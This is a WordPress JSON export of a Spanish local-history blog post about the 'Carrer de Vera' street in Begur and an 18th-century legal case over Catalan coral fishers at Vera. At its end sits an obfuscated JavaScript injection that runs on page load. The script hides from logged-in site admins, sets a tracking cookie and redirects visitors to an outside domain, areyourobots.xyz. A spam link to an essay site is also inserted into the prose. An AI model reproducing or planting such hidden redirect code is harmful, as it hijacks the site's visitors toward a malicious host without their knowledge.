{"id":2366,"date":"2016-10-22T11:06:50","date_gmt":"2016-10-22T11:06:50","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=2366"},"modified":"2018-01-15T11:33:56","modified_gmt":"2018-01-15T11:33:56","slug":"carrer-de-vera-en-begur-gerona","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2016\/10\/22\/carrer-de-vera-en-begur-gerona\/","title":{"rendered":"\u201cCARRER DE VERA\u201d EN BEGUR (GERONA)"},"content":{"rendered":"<p>Muchas veces, circunstancias imprevistas, nos conducen, por la naturaleza de los hechos, a investigar sobre cosas que ignoramos o que nunca sabr\u00edamos si no fuese porque nos \u201cpica la curiosidad\u201d o su inter\u00e9s por conocerlas.<\/p>\n<p><!--more--><\/p>\n<p>Digo esto porque, en un d\u00eda espl\u00e9ndido de verano, \u2013 corr\u00eda el a\u00f1o 2004- tomando caf\u00e9 con mi amigo Pepe Robles en el prestigioso restaurante \u201cTerraza Carmona\u201d de mi Vera querida, de forma sorpresiva, nos abord\u00f3 un desconocido con inusitado inter\u00e9s por saber si <a href=\"https:\/\/essaysdigital.com\">essaysdigital.com<\/a> \u00e9ramos oriundos de la ciudad donde \u00e9l se encontraba pasando unos d\u00edas de descanso. Le dijimos que s\u00ed y se present\u00f3 como Lluis Costa i Fern\u00e1ndez, residente en Begur (Gerona). Nos explic\u00f3 que su venida a Vera ven\u00eda motivada por su ferviente deseo de conocer la ciudad y sus gentes, as\u00ed como indagar sobre la relaci\u00f3n existente entre ambas poblaciones, tras manifestarnos que en su lugar de residencia existe una calle con el nombre \u201cCarrer de Vera\u201d, desconociendo su raz\u00f3n de ser.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/11\/begur-il_luminat_460x276.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-medium wp-image-2374\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/11\/begur-il_luminat_460x276-300x180.jpg\" alt=\"begur-il_luminat_460x276\" width=\"300\" height=\"180\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/11\/begur-il_luminat_460x276-300x180.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/11\/begur-il_luminat_460x276.jpg 460w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><br \/>\nPues bien, interesado por el caso supe que Begur es un municipio tur\u00edstico espa\u00f1ol \u2013 Costa Brava- de unos 5.000 habitantes ubicado en la provincia de Gerona, superando los 60.000 en temporada de verano y situado en la comarca catalana del Bajo Ampurd\u00e1n. Mantiene un relevante pasado hist\u00f3rico que, por los importantes restos encontrados, confirman la antig\u00fcedad de su n\u00facleo como asentamiento humano. La localidad ofrece al visitante intrincadas callejuelas empedradas, animados comercios gastron\u00f3micos y, como colof\u00f3n, los restos de un viejo castillo medieval que coronan la colina en la que se asienta la villa.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/11\/estampa-religiosa-de-begur.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-2373\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/11\/estampa-religiosa-de-begur-183x300.jpg\" alt=\"estampa-religiosa-de-begur\" width=\"183\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/11\/estampa-religiosa-de-begur-183x300.jpg 183w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/11\/estampa-religiosa-de-begur-624x1024.jpg 624w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/11\/estampa-religiosa-de-begur.jpg 720w\" sizes=\"(max-width: 183px) 100vw, 183px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/11\/Br\u00f3tola-en-Aigua-Xelida.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-2369\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/11\/Br\u00f3tola-en-Aigua-Xelida-300x207.jpg\" alt=\"brotola-en-aigua-xelida\" width=\"300\" height=\"207\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/11\/Br\u00f3tola-en-Aigua-Xelida-300x207.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/11\/Br\u00f3tola-en-Aigua-Xelida.jpg 320w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><br \/>\nAs\u00ed las cosas, me carte\u00e9 con D. Lluis y le mand\u00e9 copia del informe que obra en el Archivo Municipal de Vera sobre el caso en cuesti\u00f3n. En la portada de ese Expediente del siglo XVIII, concretamente de 28 de mayo de 1729, que lo conforman 17 p\u00e1ginas con escritura de letra human\u00edstica con trazado de la \u00e9poca, figura una denuncia de oficio de la Real Justicia contra el patr\u00f3n D. Pedro Rigau y otros seis patrones \u201cpor haberse introducido a comercio sin testimonio de sanidad ni venia de los se\u00f1ores comisarios \u201c. Ensimismado en la lectura del prolijo e interesante expediente, de \u00e9l se colige lo transcrito: \u201d que los patrones de siete barcos que dec\u00edan ser catalanes en playas jurisdiccionales de Vera se dedicaban a la pesquer\u00eda del coral sin que sus patrones hubiesen pedido licencia como era su obligaci\u00f3n ni haber manifestado a la Diputaci\u00f3n de Sanidad los testimonios de la parte desde adonde transitaban para su conocimiento de conformidad con lo prevenido en las \u00f3rdenes habiendo saltado a estas precisas circunstancias se ejecutasen por su merced justificaci\u00f3n de lo referido para en su vista dar las providencias convenientes para lo cual mando que por el Ministro ordinario de estas playas comparezcan los patrones de dichos barcos, se les reciba sus declaraciones por estos particulares para en su visita dar la providencia que convenga. Fdo.: el licenciado D. Pedro Troyano Pardo\u201d. Desde estas l\u00edneas mi sincero agradecimiento al responsable del Archivo Municipal, D. Manuel Caparr\u00f3s Perales, por su diligente labor tras la informaci\u00f3n requerida, as\u00ed como la facilitaci\u00f3n de documentos solicitados.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/11\/begur-vera.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2368\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/11\/begur-vera-300x254.jpg\" alt=\"begur-vera\" width=\"300\" height=\"254\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/11\/begur-vera-300x254.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/11\/begur-vera.jpg 590w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><br \/>\nLo curioso del caso es que tras la minuciosa lectura del expediente no hall\u00e9 la sentencia dictada a los patrones que perpetraron tan valioso expolio. Creo suponer que, por la importancia del juicio, corriese \u00e9ste en otra jurisdicci\u00f3n a cargo de una instancia superior: el Corregidor y, no, al Alcalde Mayor de Vera, que hasta 1830 era Juez y Alcalde.<br \/>\nLa b\u00fasqueda de coral, este bien preciado que los begurenses encontraron en nuestras playas, era una actividad econ\u00f3mica comercializada para ser usada en artesan\u00eda, material de construcci\u00f3n, ornamentos marinos, etc. y sus buscadores eran emigrantes que tras su regreso a Begur reprodujeron en una calle dedicada a Vera las construcciones de casas humildes, sencillas, pulcramente encaladas y con fachadas que respiran los aires del sur, nostalgia de Andaluc\u00eda y que, seguramente, habitaron durante su aventura almeriense.<br \/>\nDoce a\u00f1os despu\u00e9s de mi carteo con D. Lluis, gracias a la informaci\u00f3n que me da mi amiga Mar\u00eda Mart\u00ednez Castro, s\u00e9 que un veratense afincado en Catalu\u00f1a, D. Juan Pedro Mart\u00ednez P\u00e9rez, enterado por las redes sociales de la relaci\u00f3n de Vera con la poblaci\u00f3n de Begur, se desplaz\u00f3 a \u00e9sta para conocer algo m\u00e1s de su historia. La foto que aparece ilustrando el art\u00edculo, as\u00ed como los r\u00f3tulos explicativos junto a la calle de Vera que aparecen en la instant\u00e1nea nos dan una idea de la nostalgia que siente este paisano nuestro por su pueblo.<br \/>\nAcabo esto como empec\u00e9 para decir que, alguna que otra vez, nos enteramos de cosas, sucesos o hechos que nunca conocer\u00edamos a no ser que, fruto de la casualidad, como a m\u00ed me pas\u00f3, el destino me hubiese deparado un fortuito encuentro.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/11\/coral-mossos-escuadra.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2370\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/11\/coral-mossos-escuadra-300x251.jpg\" alt=\"coral-mossos-escuadra\" width=\"300\" height=\"251\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/11\/coral-mossos-escuadra-300x251.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/11\/coral-mossos-escuadra-768x643.jpg 768w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/11\/coral-mossos-escuadra.jpg 944w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/11\/coral.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2371\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/11\/coral-300x199.jpg\" alt=\"coral\" width=\"300\" height=\"199\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/11\/coral-300x199.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/11\/coral-768x509.jpg 768w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/11\/coral-1024x678.jpg 1024w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/11\/coral.jpg 1600w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p style=\"text-align: right\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/diego-morales.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1955\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/02\/diego-morales.jpg\" alt=\"diego morales\" width=\"179\" height=\"109\" \/><\/a><br \/>\nAutor: Diego Morales Carmona<\/p>\n<p><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Muchas veces, circunstancias imprevistas, nos conducen, por la naturaleza de los hechos, a investigar sobre cosas que ignoramos o que nunca sabr\u00edamos si no fuese porque nos \u201cpica la curiosidad\u201d o su inter\u00e9s por conocerlas.<\/p>\n","protected":false},"author":7,"featured_media":2372,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[109],"tags":[188,22,187,82,269],"class_list":["post-2366","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-historia","tag-begur","tag-calles","tag-coral","tag-diego-morales-carmona","tag-s-xviii"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/2366","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=2366"}],"version-history":[{"count":4,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/2366\/revisions"}],"predecessor-version":[{"id":3184,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/2366\/revisions\/3184"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/2372"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=2366"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=2366"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=2366"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}